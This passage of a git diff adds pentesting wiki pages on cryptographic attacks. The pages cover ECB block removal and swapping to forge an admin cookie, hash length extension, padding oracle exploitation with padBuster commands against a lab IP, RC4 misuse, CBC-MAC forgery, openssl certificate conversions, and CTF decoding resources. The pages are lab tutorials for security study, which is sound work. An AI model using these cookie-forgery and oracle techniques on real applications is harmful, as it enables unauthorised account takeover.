+![License](https://assets.pentesterlab.com/ecb/ECB_encryption.png) + +You can check the [recent XKCD on the Adobe's password leak](http://xkcd.com/1286/) to get an humoristic idea of the problems tied to ECB. + +During the decryption, the reverse operation is used. Using ECB has multiple security implications: + +* Blocks from encrypted message can be removed without disturbing the decryption process. +* Blocks from encrypted message can be moved around without disturbing the decryption process. + +In this exercise, we will see how we can exploit these two weaknesses. + +## Detection of the vulnerability + +In this exercise, you can register an account and log in with this account \(to make things easier, you get automatically logged in when you register\). + +If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change.If you log in many times and always get the same cookie, there is probably something wrong in the application. The cookie sent back should be unique each time you log in. If the cookie is always the same, it will probably always be valid and there won't be anyway to invalidate it. + +If we look at the cookie, we can see that it seems uri-encoded and base64-encoded: + +![License](https://assets.pentesterlab.com/ecb/cookie.png) + +The 2 equals sign encoded as `%3d%3d` are a good indicator of base64-encoded string. + +We can decode it using the following ruby code: + +```text +% irb +> require 'base64' ; require 'uri' + => true +> Base64.decode64(URI.decode("OR9hcp18%2BC1bChK10NlRRg%3d%3d")) + => "9\x1Far\x9D|\xF8-[\n\x12\xB5\xD0\xD9QF" +``` + +Or by decoding the URI to a string manually and use the base64 command: + +```text +% echo "OR9hcp18+C1bChK10NlRRg==" | base64 -D | hexdump -C +0000000 39 1f 61 72 9d 7c f8 2d 5b 0a 12 b5 d0 d9 51 46 |9.ar.|.-[.....QF| +0000010 +``` + +On osX, the command `base64 -D` replaces `base64 -d` + +In both cases, we can see that the information seems to be encrypted. + +First, we can start by creating two accounts `test1` and `test2` with the same password: `password` and compare the cookies sent by the application. We get the following cookies \(after URI-decoding\): + +| Account: | test1 | test2 | +| :--- | :--- | :--- | +| Cookie: | vHMQ+Nq9C3MHT8ZkGeMr4w== | Mh+JMH1OMhcHT8ZkGeMr4w== | + +If we base64-decode both cookies, we get the following strings: + +| Account: | test1 | test2 | +| :--- | :--- | :--- | +| Decoded cookie: | \xBCs\x10\xF8\xDA\xBD\vs**\aO\xC6d\x19\xE3+\xE3** | 2\x1F\x890}N2\x17**\aO\xC6d\x19\xE3+\xE3** | + +We can see that part of the decrypted values look really similar. + +Now we can try to create a user with an arbitrary long username and password. For example, a username composed of 20 `a` and a password composed of 20 `a`. By creating this user, we get the following cookie: + +```text +> document.cookie +"auth=GkzSM2vKHdcaTNIza8od1wS28inRHiC2GkzSM2vKHdcaTNIza8od1ys96EXmirn5" +``` + +If we decode this value, we get the following value: + +```text +\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7\x04\xB6\xF2)\xD1\x1E \xB6\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7+=\xE8E\xE6\x8A\xB9\xF9 +``` + +We can see that the following pattern \(composed of 8 bytes\): **`\x1AL\xD23k\xCA\x1D\xD7`** comes back multiple times: + +```text +\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7\x04\xB6\xF2)\xD1\x1E \xB6\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7+=\xE8E\xE6\x8A\xB9\xF9 +``` + +Based on the size of the pattern, we can infer that the ECB encryption uses a block size of 8 bytes.This example is using a weak encryption mechanism and it's likely that real life examples will use bigger block size. + +The decoded information also shows us that the username and password are not directly concatenated and that a delimiter is added \(since one of the block in the middle is different from the previous one\). + +We can think of the encrypted stream has one of the two following possibilities: + +* The stream contains the username, a delimiter and the password: + +![Schema username password](https://assets.pentesterlab.com/ecb/del_u_p.png) + +* The stream contains the password, a delimiter and the username: + +![Schema password username](https://assets.pentesterlab.com/ecb/del_p_u.png) + +By creating another user with a long username and a short password, we can see that the following pattern is used: `username|delimiter|password`. + +Now let's try to find the size of the delimiter, if we play with different size of username and password we get the following results: + +| Username length: | Password length: | Username+Password length: | Cookie's length \(after decoding\): | +| :--- | :--- | :--- | :--- | +| 2 | 3 | 5 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 4 | 5 | 9 | 16 | + +We can see that the size of the decoded cookie goes from 8 to 16 bytes when the length of the Username+Password is greater than 7. We can infer from this value that the delimiter is a single byte since the encryption is done per block of 8 bytes. + +Another important thing is to see what part of the encrypted stream is used by the application when we send the cookie back. If we remove everything after the block corresponding to the delimiter, we can see that we are still authenticated. The password does not seem to be used when the cookie gets used by the application. + +We now know that we just need to get the correct `username|delimiter` to get authenticated within the application as `username`.If you can find what delimiter is used \(or brute force it\), you can try to create a user with a username that contains the delimiter \(for example the username "`admin:`"\). Using this method, you may be able to get logged in as `admin`. This web application prevents this type of attack. + +## Exploitation of the vulnerability + +### By removing information + +The easiest way to get `admin` access is to remove some of the encrypted data. We know that the application uses the following format: + +```text +\[username\]:\[separator\] +``` + +and only uses the `username` when the cookie is sent back to the application. We also know that each block of 8 bytes is completely independant \(ECB\). To exploit this issue, we can create a username that contains 8 characters followed by the word `admin`: + +```text +aaaaaaaaadmin +``` + +And we will receive the cookie \(retrieved using the Javascript Console\): + +```text +> document.cookie +"auth=GkzSM2vKHdfgVmQuKXLregdPxmQZ4yvj" +``` + +This value will get decoded as: + +```text +\x1AL\xD23k\xCA\x1D\xD7\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3 +``` + +We can see the pattern `\x1AL\xD23k\xCA\x1D\xD7` detected previously with the username that contained 20 `a`. + +We can then remove the first 8 bytes of information and reencode our payload to get a new cookie: + +```text +\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3 +``` + +That will get encoded by the following ruby code: + +```text +% irb +> require 'cgi'; require 'base64' + => true +> CGI.escape(Base64.strict_encode64("\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3")) + => "4FZkLily63oHT8ZkGeMr4w%3D%3D" +``` + +Once you modify the cookie: + +![Cookie tampering with JS console](https://assets.pentesterlab.com/ecb/cookiemod.png) + +And send this value back to the application \(by reloading the page\), you get logged in as `admin`: + +![License](https://assets.pentesterlab.com/ecb/admin.png) + +### By swapping blocks around + +A more complicated way to bypass this is to swap data around. We can make the assumption that the application will use an SQL query to retrieve information from the user based on his `username`. For some databases, when using the type of data `VARCHAR` \(as opposed to `BINARY` for example\), the following will give the same result: + +```text +SELECT * FROM users WHERE username='admin'; +``` + +```text +SELECT * FROM users WHERE username='admin '; +``` + +The spaces after the value `admin` are ignored during the string comparison. We will use this to play with the encrypted blocks. + +Our goal is to end up with the following encrypted data: + +```text +ECB(admin [separator]password) +``` + +We know that our separator is only composed of one byte. We can use this information to create the perfect `username` and `password`to be able to swap the blocks and get the correct forged value. + +We need to find a username and a password for which: + +* the password starts with `admin` to be used as the new username. +* the encrypted password should be located at the start of a new block. +* the `username+delimiter` length should be divisible by the block size \(from previous conditions\) + +By playing around, we can see that the following values work: + +* a `username` composed of `password` \(8 bytes\) followed by 7 spaces \(1 byte will be used by the delimiter\). +* a `password` composed of `admin` followed by 3 spaces \(`8 - length("admin")`\). + +When creating this user, use a proxy to intercept the request and make sure your browser didn't remove the space characters. + +If you create correctly this user, the encrypted information will look like:![License](https://assets.pentesterlab.com/ecb/swap-b.png) + +Using some Ruby \(or even with Burp decoder\), you can swap the first 8 bytes with the last 8 bytes to get the following encrypted stream:![License](https://assets.pentesterlab.com/ecb/swap-a.png) + +Once you modify your cookie, and you reload the page, you should be logged in as `admin`: + +![License](https://assets.pentesterlab.com/ecb/admin.png) + +## Conclusion + +This exercise showed you how you can tamper encrypted information without decrypting them and use this behaviour to gain access to other accounts. It showed you that encryption can not be used as a replacement to signature and how it's possible to use ECB encryption to get control on the decrypted information. I hope you enjoyed learning with PentesterLab. + diff --git a/crypto/hash-length-extension-attack.md b/crypto/hash-length-extension-attack.md new file mode 100644 index 00000000000..6dbcbcc0696 --- /dev/null +++ b/crypto/hash-length-extension-attack.md @@ -0,0 +1,35 @@ +# Hash Length Extension Attack + +## Summary of the attack + +Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: + +* **The length of the secret** \(this can be also bruteforced from a given length range\) +* **The clear text data** +* **The algorithm \(and it's vulnerable to this attack\)** +* **The padding is known** + * Usually a default one is used, so if the other 3 requirements are met, this also is + * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed + +Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**. + +### How? + +Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** \(state\), they **add the next block of data** and **hash it**. + +Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b. +If an attacker wants to append the string "append" he can: + +* Generate a MD5 of 64 "A"s +* Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b +* Append the string "append" +* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** + +### **Tool** + +{% embed url="https://github.com/iagox86/hash\_extender" %} + +## References + +You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) + diff --git a/crypto/padding-oracle-priv.md b/crypto/padding-oracle-priv.md new file mode 100644 index 00000000000..1a1100ce546 --- /dev/null +++ b/crypto/padding-oracle-priv.md @@ -0,0 +1,125 @@ +--- +description: 'https://pentesterlab.com/' +--- + +# Padding Oracle + +**Post from** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\* + +## Cipher Block Chaining + +CBC is an encryption mode in which the message is split into blocks of X bytes length and each block is XORed with the previous encrypted block. The result is then encrypted. + +The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) explains this method: + +![CBC encryption](https://assets.pentesterlab.com/padding_oracle/CBC_encryption.png) + +During the decryption, the reverse operation is used. The encrypted data is split in block of X bytes. Then the block is decrypted and XORed with the previous encrypted block to get the cleartext. The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) highlights this behavior: + +![CBC decryption](https://assets.pentesterlab.com/padding_oracle/CBC_decryption.png) + +Since the first block does not have a previous block, an initialization vector \(IV\) is used. + +## Padding + +As we saw, the encryption is done by blocks of fixed size. To ensure that the cleartext exactly fit in one or multiple blocks, padding is often used. Padding can be done in multiple ways. A common way is to use PKCS7. With PKCS7, the padding will be composed of the same number: the number of bytes missing. For example, if the cleartext is missing 2 bytes, the padding will be `\x02\x02`. + +Let's look at more examples with a 2 blocks: + +| Block \#0 | Block \#1 | | | | | | | | | | | | | | | +| :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | +| byte \#0 | byte \#1 | byte \#2 | byte \#3 | byte \#4 | byte \#5 | byte \#6 | byte \#7 | byte \#0 | byte \#1 | byte \#2 | byte \#3 | byte \#4 | byte \#5 | byte \#6 | byte \#7 | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | '1' | '2' | '3' | **0x02** | **0x02** | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | '1' | '2' | **0x03** | **0x03** | **0x03** | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | + +## Padding Oracle + +When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, **if** an **invalid** **padding** triggers a detectable **behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack** of **results**, or a **slower response**. + +If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. + +### How to exploit + +You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do + +```text +sudo apt-get install padbuster +``` + +In order to test if the cookie of a site is vulnerable you could try: + +```bash +perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "auth=Nl0OpaQYeGPMJeWSih2iiQ==" +``` + +**Encoding 0** means that **base64** is used \(but others are available, check the help menu\). + +You could also **abuse** this **vulnerability** to **encrypt new data**. For example, imagine that the content of the cookie is "_user=MyUsername_", then you may change it to "_**user=administrator**_" and escalate privileges inside the application. You could also do it using `paduster`specifying the **-plaintext** parameter: + +```bash +perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "auth=Nl0OpaQYeGPMJeWSih2iiQ==" -plaintext "user=administrator" +``` + +If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter. + +```bash +perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "hcon=Nl0OpaQYeGPMJeWSih2iiQ==" -error "Invalid padding" +``` + +### The theory + +In **summary**, you can start decrypting the encrypted data by **guessing** the correct **values** that can be used to **create** all the **different paddings**. Then, the padding oracle attack will start **decrypting** bytes **from** the **end** to the start by **guessing** which will be the correct **value** that **creates a padding of 1, 2, 3, etc**. + +If we zoom in, we can see that the cleartext byte `C15` is just a XOR between the encrypted byte `E7` from the previous block, and byte `I15` which came out of the block decryption step: + +![CBC zoom in](https://assets.pentesterlab.com/padding_oracle/zoomin.png) + +This is also valid for all other bytes: + +* `C14 = I14 ^ E6` +* `C13 = I13 ^ E5` +* `C12 = I12 ^ E4` +* ... + +Now if we modify `E7` and keep changing its value, we will keep getting an invalid padding. Since we need `C15` to be `\x01`. However, there is one value of `E7` that will give us a valid padding. Let's call it `E'7`. With `E'7`, we get a valid padding. And since we know we get a valid padding we know that `C'15` \(as in `C15` for `E'7`\) is `\x01`. + +`\x01 = I15 ^ E'7` + +The gives us: + +`I15 = \x01 ^ E'7` + +So we are able to compute `I15`. + +Since we know `I15`, we can now compute `C15` + +`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` + +Now that we have `C15`, we can move to brute-forcing `C14`. First we need to compute another `E7` \(let's call it `E''7`\) that gives us `C15 = \x02`. We need to do that since we want the padding to be `\x02\x02` now. It's really simple to compute using the property above and by replacing the value of `C15` we want \(`\x02`\) and `I15` we now know: + +`E''7 = \x02 ^ I15` + +After brute force `E6`, to find the value that gives us a valid padding `E''6`, we can re-use the formula: + +`C14 = I14 ^ E6` + +to get + +`I14 = \x02 ^ E''6` + +Once we get `I14`, we can compute `C14`: + +`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6` + +Using this method, we can keep going until we get all the ciphertext decrypted. + +### Detection of the vulnerability + +To get started, you can register an account and log in with this account \(to make things easier, you get automatically logged in when you register\). + +If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change.If you log in many times and always get the same cookie, there is probably something wrong in the application. The cookie sent back should be unique each time you log in. If the cookie is always the same, it will probably always be valid and there won't be anyway to invalidate it. + +Now, if you try to modify the cookie, you can see that you get an error from the application. + diff --git a/crypto/rc4-encrypt-and-decrypt.md b/crypto/rc4-encrypt-and-decrypt.md new file mode 100644 index 00000000000..12991b9aeda --- /dev/null +++ b/crypto/rc4-encrypt-and-decrypt.md @@ -0,0 +1,14 @@ +# RC4 - Encrypt&Decrypt + +If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4\(using the same password\) just using the encryption function. + +If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: + +{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + +{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + +\*\*\*\* + + + diff --git a/cryptography/certificates.md b/cryptography/certificates.md new file mode 100644 index 00000000000..e939f56bdd3 --- /dev/null +++ b/cryptography/certificates.md @@ -0,0 +1,176 @@ +# Certificates + +## What is a Certificate + +In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. + +In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) \(PKI\) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate_authority) \(CA\), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web_of_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate. + +The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. + +## x509 Common Fields + +* **Version Number:** Version of x509 format. +* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. +* **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization. + * **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards. + * **Country \(C\)**: Country + * **Distinguished name \(DN\)**: The whole subject: `C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net` + * **Locality \(L\)**: Local place + * **Organization \(O\)**: Organization name + * **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\). + * **State or Province \(ST, S or P\)**: List of state or province names +* **Issuer**: The entity that verified the information and signed the certificate. + * **Common Name \(CN\)**: Name of the certificate authority + * **Country \(C\)**: Country of the certificate authority + * **Distinguished name \(DN\)**: Distinguished name of the certificate authority + * **Locality \(L\)**: Local place where the organisation can be found. + * **Organization \(O\)**: Organisation name + * **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\). +* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock_skew#On_a_network) problems. +* **Not After**: The time and date past which the certificate is no longer valid. +* **Public Key**: A public key belonging to the certificate subject. \(This is one of the main parts as this is what is signed by the CA\) + * **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA. + * **Public Key Curve**: The curve used by the elliptic curve public key algorithm \(if apply\). Like nistp521. + * **Public Key Exponent**: Exponent used to derive the public key \(if apply\). Like 65537. + * **Public Key Size**: The size of the public key space in bits. Like 2048. + * **Signature Algorithm**: The algorithm used to sign the public key certificate. + * **Signature**: A signature of the certificate body by the issuer's private key. +* **x509v3 extensions** + * **Key Usage**: The valid cryptographic uses of the certificate's public key. Common values include digital signature validation, key encipherment, and certificate signing. + * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature` + * **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing. + * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` + * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. + * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example \(the last par of the chain\). + * **Subject Key Identifier** \(SKI\): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** \(AKI\) extension on issued certificates. It's the hash of the subject public key. + * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. + * **Authority Information Access** \(AIA\): This extension contains at most two types of information : + * Information about **how to get the issuer of this certificate** \(CA issuer access method\) + * Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\). + * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. + * **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate + +### Difference between OSCP and CRL Distribution Points + +**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**. +**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries. +From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm#:~:text=OCSP%20%28RFC%202560%29%20is%20a,to%20download%20the%20entire%20CRL.&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.). + +### What is Certificate Transparency + +Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals: + +* Make it impossible \(or at least very difficult\) for a CA to **issue a SSL certificate for a domain without the certificate being visible to the owner** of that domain. +* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued. +* **Protect users** \(as much as possible\) from being duped by certificates that were mistakenly or maliciously issued. + +#### **Certificate Logs** + +Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large \(say, much less than a thousand worldwide\), and each could be operated independently by a CA, an ISP, or any other interested party. + +#### Query + +You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh/). + +## Formats + +There are different formats that can be used to store a certificate. + +#### **PEM Format** + +* It is the most common format used for certificates +* Most servers \(Ex: Apache\) expects the certificates and private key to be in a separate files - Usually they are Base64 encoded ASCII files - Extensions used for PEM certificates are .cer, .crt, .pem, .key files - Apache and similar server uses PEM format certificates + +#### **DER Format** + +* The DER format is the binary form of the certificate +* All types of certificates & private keys can be encoded in DER format +* DER formatted certificates do not contain the "BEGIN CERTIFICATE/END CERTIFICATE" statements +* DER formatted certificates most often use the ‘.cer’ and '.der' extensions +* DER is typically used in Java Platforms + +#### **P7B/PKCS\#7 Format** + +* The PKCS\#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c +* A P7B file only contains certificates and chain certificates \(Intermediate CAs\), not the private key +* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat + +#### **PFX/P12/PKCS\#12 Format** + +* The PKCS\#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file +* These files usually have extensions such as .pfx and .p12 +* They are typically used on Windows machines to import and export certificates and private keys + +### Formats conversions + +**Convert x509 to PEM** + +```text +openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem +``` + +#### **Convert PEM to DER** + +```text +openssl x509 -outform der -in certificatename.pem -out certificatename.der +``` + +**Convert DER to PEM** + +```text +openssl x509 -inform der -in certificatename.der -out certificatename.pem +``` + +**Convert PEM to P7B** + +**Note:** The PKCS\#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. ****A P7B file only contains certificates and chain certificates \(Intermediate CAs\), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat. + +```text +openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer +``` + +**Convert PKCS7 to PEM** + +```text +openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem +``` + +**Convert pfx to PEM** + +**Note:** The PKCS\#12 or PFX format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file. PFX files usually have extensions such as .pfx and .p12. PFX files are typically used on Windows machines to import and export certificates and private keys. + +```text +openssl pkcs12 -in certificatename.pfx -out certificatename.pem +``` + +**Convert PFX to PKCS\#8** +**Note:** This requires 2 commands + +**1- Convert PFX to PEM** + +```text +openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem +``` + +**2- Convert PEM to PKCS8** + +```text +openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 +``` + +**Convert P7B to PFX** +**Note:** This requires 2 commands + +1- **Convert P7B to CER** + +```text +openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer +``` + +**2- Convert CER and Private Key to PFX** + +```text +openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer +``` + diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md new file mode 100644 index 00000000000..01d3f011fd1 --- /dev/null +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -0,0 +1,65 @@ +--- +description: 'https://pentesterlab.com/' +--- + +# Cipher Block Chaining CBC-MAC + +**Post from** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\* + +## CBC + +The easiest attack to test is that if the cookie just the username encrypted. + +If the cookie is only the username \(or the first part of the cookie is the username\) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and bruteforce the first byte of the cookie. + +## CBC-MAC + +CBC-MAC is a method to ensure integrity of a message by encrypting it using CBC mode and keeping the last encrypted block as "signature". This ensures that a malicious user can not modify any part of the data without having to change the signature. The key used for the "encryption" ensures that the signature can't be guessed. + +However, when using CBC-MAC, the developer needs to be very careful if the message are not of fixed length. In this example, we will use the fact that there is no protection in place to get the application to sign two messages and build another message by concatenating the two messages. + +## Theory + +With CBC-MAC, we can generate two signatures `t` and `t'` for the messages `m` and `m'`. By using `m` and `m'` we can forge another message `m''` that will have the same signature as `m'` \(`t'`\). One thing to keep in mind is that the recommended way to use CBC-MAC is to use a NULL IV. + +To keep things simple, we are going to work on a single block for each message. + +We can see below how signing both messages works \(NB: both signatures are completely independent from each other\): + +![](https://pentesterlab.com/cbc-mac/cbc-mac-1.png) + +If we try to concatenate those messages, the signature is no longer valid \(since `t` is now the IV for the second block where it was only NULL before\): + +![](https://pentesterlab.com/cbc-mac/cbc-mac-2.png) + +However, if we XOR `m'` and `t`, the signature is now `t'`: + +![](https://pentesterlab.com/cbc-mac/cbc-mac-3.png) + +## Implementation + +Based on the size of the signature, we can guess that the block size is likely to be 8. With this information, we will split `administrator`: + +* `administ` +* `rator\00\00\00` + +We can trivially generate the signature for the first block, by just logging in and retrieving the signature `t`. + +For the second block, we want the `m'` XOR `t` to be equal to `rator\00\00\00`. So to generate the second username we will need to XOR `rator\00\00\00` with `t` \(since the application will sign it with a NULL IV instead of `t`\). Once we have this value, we can get the signature `t'`. + +Finally, we just need to concatenate `m` and `m'` to get `administrator` and use `t'` as signature. + +#### Resume + +1. Get the signature of username **administ** = **t** +2. Get the signature of username **rator\x00\x00\x00 XOR t** = **t'** +3. Set in the cookie the value **administrator+t'** \(**t'** will be a valid signature of **\(rator\x00\x00\x00 XOR t\) XOR t** = **rator\x00\x00\x00** + +### CBC-MAC simple attack \(controlling IV\) + +If you can control the used IV the attack could be very easy. + +To impersonate the user "**administrator**" you can create the user "**Administrator**" and you will have the cookie with the **username+signature** and the cookie with the **IV**. + +To generate the cookies of the username "**administrator**" change the first cookie and set the username from "**Administrator**" to "**administrator**". Change the first byte of the cookie of the **IV** so **IV\[0\] XOR "A" == IV'\[0\] XOR "a"**. Using these cookies you can login as administrator. + diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md new file mode 100644 index 00000000000..b2529d9dd11 --- /dev/null +++ b/cryptography/crypto-ctfs-tricks.md @@ -0,0 +1,256 @@ +# Crypto CTFs Tricks + +## Online Hashes DBs + +* _**Google it**_ +* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/) +* [https://crackstation.net/](https://crackstation.net/) +* [https://md5decrypt.net/](https://md5decrypt.net/) +* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com) +* [https://gpuhash.me/](https://gpuhash.me/) +* [https://hashes.org/search.php](https://hashes.org/search.php) +* [https://www.cmd5.org/](https://www.cmd5.org/) +* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) +* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) + +## Encoders + +Most of encoded data can be decoded with these 2 ressources: + +* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) + +### Substitution Autosolvers + +* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) +* [https://quipqiup.com/](https://quipqiup.com/) - Very good ! + +#### Caesar - ROTx Autosolvers + +* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) + +#### Atbash Cipher + +* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) + +### Similar to BASE64 + +Check all bases with: [https://github.com/mufeedvh/basecrack](https://github.com/mufeedvh/basecrack) + +* **Base32** \[_A-Z2-7=_\] + * `NBXWYYLDMFZGCY3PNRQQ====` +* **Base58** 